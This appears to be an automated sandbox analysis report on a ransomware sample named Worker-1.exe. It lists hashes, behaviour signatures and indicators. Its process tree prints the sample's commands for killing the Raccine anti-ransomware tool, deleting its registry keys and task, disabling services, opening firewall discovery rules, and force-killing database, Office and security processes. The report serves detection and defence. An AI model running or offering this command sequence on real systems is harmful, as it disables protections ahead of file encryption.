2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21

Resubmissions

04-11-2021 15:34

211104-sz21psghe5 10

29-10-2021 15:29

211029-swzq6saccp 10

29-10-2021 07:07

211029-hxtanshefl 8

Analysis

max time kernel
84s
max time network
127s
platform
windows7_x64
resource
win7-en-20211014
submitted
29-10-2021 07:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Worker-1.exe
Size

385KB
MD5

7677a593678d9c4552578fab18a27384
SHA1

5c3b0d278df728c67122ac3ab7184c3f9ebfaa4f
SHA256

2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21
SHA512

8bbce3eefabf7e7d900ba3fa0a42ca3be265425c8b5675e27839a1397d1653ae54e3abbd8a6b0b8ff7ab44d130afb1a81d04d57af42dc45e7227d676a335e082

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	15	http://live.sysinternals.com/PsExec.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ExpandUnpublish.tif.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\NewConnect.png => C:\Users\Admin\Pictures\NewConnect.png.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\NewConnect.png.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\RequestCopy.png => C:\Users\Admin\Pictures\RequestCopy.png.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\RequestCopy.png.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\SyncRead.raw => C:\Users\Admin\Pictures\SyncRead.raw.v4cnyy	Worker-1.exe
File opened for modification	C:\Users\Admin\Pictures\SyncRead.raw.v4cnyy	Worker-1.exe
File renamed	C:\Users\Admin\Pictures\ExpandUnpublish.tif => C:\Users\Admin\Pictures\ExpandUnpublish.tif.v4cnyy	Worker-1.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	Worker-1.exe
File opened (read-only)	\??\F:	Worker-1.exe
File opened (read-only)	\??\L:	Worker-1.exe
File opened (read-only)	\??\V:	Worker-1.exe
File opened (read-only)	\??\B:	Worker-1.exe
File opened (read-only)	\??\W:	Worker-1.exe
File opened (read-only)	\??\T:	Worker-1.exe
File opened (read-only)	\??\H:	Worker-1.exe
File opened (read-only)	\??\X:	Worker-1.exe
File opened (read-only)	\??\M:	Worker-1.exe
File opened (read-only)	\??\I:	Worker-1.exe
File opened (read-only)	\??\S:	Worker-1.exe
File opened (read-only)	\??\G:	Worker-1.exe
File opened (read-only)	\??\K:	Worker-1.exe
File opened (read-only)	\??\N:	Worker-1.exe
File opened (read-only)	\??\E:	Worker-1.exe
File opened (read-only)	\??\A:	Worker-1.exe
File opened (read-only)	\??\Y:	Worker-1.exe
File opened (read-only)	\??\U:	Worker-1.exe
File opened (read-only)	\??\O:	Worker-1.exe
File opened (read-only)	\??\J:	Worker-1.exe
File opened (read-only)	\??\Z:	Worker-1.exe
File opened (read-only)	\??\Q:	Worker-1.exe
File opened (read-only)	\??\R:	Worker-1.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	Worker-1.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
1464	taskkill.exe
936	taskkill.exe
1180	taskkill.exe
2000	taskkill.exe
1736	taskkill.exe
1916	taskkill.exe
1528	taskkill.exe
992	taskkill.exe
1728	taskkill.exe
1212	taskkill.exe
1496	taskkill.exe
1768	taskkill.exe
2036	taskkill.exe
1204	taskkill.exe
1940	taskkill.exe
1080	taskkill.exe
988	taskkill.exe
1992	taskkill.exe
980	taskkill.exe
820	taskkill.exe
1948	taskkill.exe
324	taskkill.exe
852	taskkill.exe
880	taskkill.exe
1596	taskkill.exe
884	taskkill.exe
972	taskkill.exe
1748	taskkill.exe
440	taskkill.exe
1616	taskkill.exe
620	taskkill.exe
1536	taskkill.exe
1596	taskkill.exe
1588	taskkill.exe
1724	taskkill.exe
940	taskkill.exe
816	taskkill.exe
1464	taskkill.exe
1592	taskkill.exe
968	taskkill.exe
1476	taskkill.exe
1180	taskkill.exe
884	taskkill.exe
1608	taskkill.exe
1956	taskkill.exe
1528	taskkill.exe
1968	taskkill.exe
1472	taskkill.exe
1740	taskkill.exe
1736	taskkill.exe
1712	taskkill.exe
1588	taskkill.exe
816	taskkill.exe
988	taskkill.exe
1460	taskkill.exe
820	taskkill.exe
876	taskkill.exe
612	taskkill.exe

Modifies registry class 31 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_Classes\Local Settings	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257"	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	splwow64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	splwow64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	splwow64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	splwow64.exe
Key created	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	splwow64.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1644	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1632	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe
1116	Worker-1.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeDebugPrivilege	1116	Worker-1.exe
Token: SeDebugPrivilege	1116	Worker-1.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1212	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	612	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	880	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	440	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	992	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	936	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	1208	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1116	Worker-1.exe
1116	Worker-1.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1116	Worker-1.exe
1116	Worker-1.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2036	splwow64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 1608	1116	Worker-1.exe	29
PID 1116 wrote to memory of 1608	1116	Worker-1.exe	29
PID 1116 wrote to memory of 1608	1116	Worker-1.exe	29
PID 1116 wrote to memory of 1608	1116	Worker-1.exe	29
PID 1116 wrote to memory of 1968	1116	Worker-1.exe	31
PID 1116 wrote to memory of 1968	1116	Worker-1.exe	31
PID 1116 wrote to memory of 1968	1116	Worker-1.exe	31
PID 1116 wrote to memory of 1968	1116	Worker-1.exe	31
PID 1116 wrote to memory of 1644	1116	Worker-1.exe	33
PID 1116 wrote to memory of 1644	1116	Worker-1.exe	33
PID 1116 wrote to memory of 1644	1116	Worker-1.exe	33
PID 1116 wrote to memory of 1644	1116	Worker-1.exe	33
PID 1116 wrote to memory of 1476	1116	Worker-1.exe	35
PID 1116 wrote to memory of 1476	1116	Worker-1.exe	35
PID 1116 wrote to memory of 1476	1116	Worker-1.exe	35
PID 1116 wrote to memory of 1476	1116	Worker-1.exe	35
PID 1116 wrote to memory of 1296	1116	Worker-1.exe	37
PID 1116 wrote to memory of 1296	1116	Worker-1.exe	37
PID 1116 wrote to memory of 1296	1116	Worker-1.exe	37
PID 1116 wrote to memory of 1296	1116	Worker-1.exe	37
PID 1116 wrote to memory of 1544	1116	Worker-1.exe	38
PID 1116 wrote to memory of 1544	1116	Worker-1.exe	38
PID 1116 wrote to memory of 1544	1116	Worker-1.exe	38
PID 1116 wrote to memory of 1544	1116	Worker-1.exe	38
PID 1116 wrote to memory of 1924	1116	Worker-1.exe	40
PID 1116 wrote to memory of 1924	1116	Worker-1.exe	40
PID 1116 wrote to memory of 1924	1116	Worker-1.exe	40
PID 1116 wrote to memory of 1924	1116	Worker-1.exe	40
PID 1116 wrote to memory of 2044	1116	Worker-1.exe	43
PID 1116 wrote to memory of 2044	1116	Worker-1.exe	43
PID 1116 wrote to memory of 2044	1116	Worker-1.exe	43
PID 1116 wrote to memory of 2044	1116	Worker-1.exe	43
PID 1116 wrote to memory of 1908	1116	Worker-1.exe	44
PID 1116 wrote to memory of 1908	1116	Worker-1.exe	44
PID 1116 wrote to memory of 1908	1116	Worker-1.exe	44
PID 1116 wrote to memory of 1908	1116	Worker-1.exe	44
PID 1116 wrote to memory of 852	1116	Worker-1.exe	47
PID 1116 wrote to memory of 852	1116	Worker-1.exe	47
PID 1116 wrote to memory of 852	1116	Worker-1.exe	47
PID 1116 wrote to memory of 852	1116	Worker-1.exe	47
PID 1116 wrote to memory of 1060	1116	Worker-1.exe	49
PID 1116 wrote to memory of 1060	1116	Worker-1.exe	49
PID 1116 wrote to memory of 1060	1116	Worker-1.exe	49
PID 1116 wrote to memory of 1060	1116	Worker-1.exe	49
PID 1116 wrote to memory of 952	1116	Worker-1.exe	51
PID 1116 wrote to memory of 952	1116	Worker-1.exe	51
PID 1116 wrote to memory of 952	1116	Worker-1.exe	51
PID 1116 wrote to memory of 952	1116	Worker-1.exe	51
PID 1116 wrote to memory of 2020	1116	Worker-1.exe	53
PID 1116 wrote to memory of 2020	1116	Worker-1.exe	53
PID 1116 wrote to memory of 2020	1116	Worker-1.exe	53
PID 1116 wrote to memory of 2020	1116	Worker-1.exe	53
PID 1116 wrote to memory of 1596	1116	Worker-1.exe	55
PID 1116 wrote to memory of 1596	1116	Worker-1.exe	55
PID 1116 wrote to memory of 1596	1116	Worker-1.exe	55
PID 1116 wrote to memory of 1596	1116	Worker-1.exe	55
PID 1116 wrote to memory of 1588	1116	Worker-1.exe	57
PID 1116 wrote to memory of 1588	1116	Worker-1.exe	57
PID 1116 wrote to memory of 1588	1116	Worker-1.exe	57
PID 1116 wrote to memory of 1588	1116	Worker-1.exe	57
PID 1116 wrote to memory of 816	1116	Worker-1.exe	59
PID 1116 wrote to memory of 816	1116	Worker-1.exe	59
PID 1116 wrote to memory of 816	1116	Worker-1.exe	59
PID 1116 wrote to memory of 816	1116	Worker-1.exe	59

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	Worker-1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	Worker-1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	Worker-1.exe

C:\Users\Admin\AppData\Local\Temp\Worker-1.exe
"C:\Users\Admin\AppData\Local\Temp\Worker-1.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1116
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1968
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1644
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1476
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1296
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1544
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1924
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:2044
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1908
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:852
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1060
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:952
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:2020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1212
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:820
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1204
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:620
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2000
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1536
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
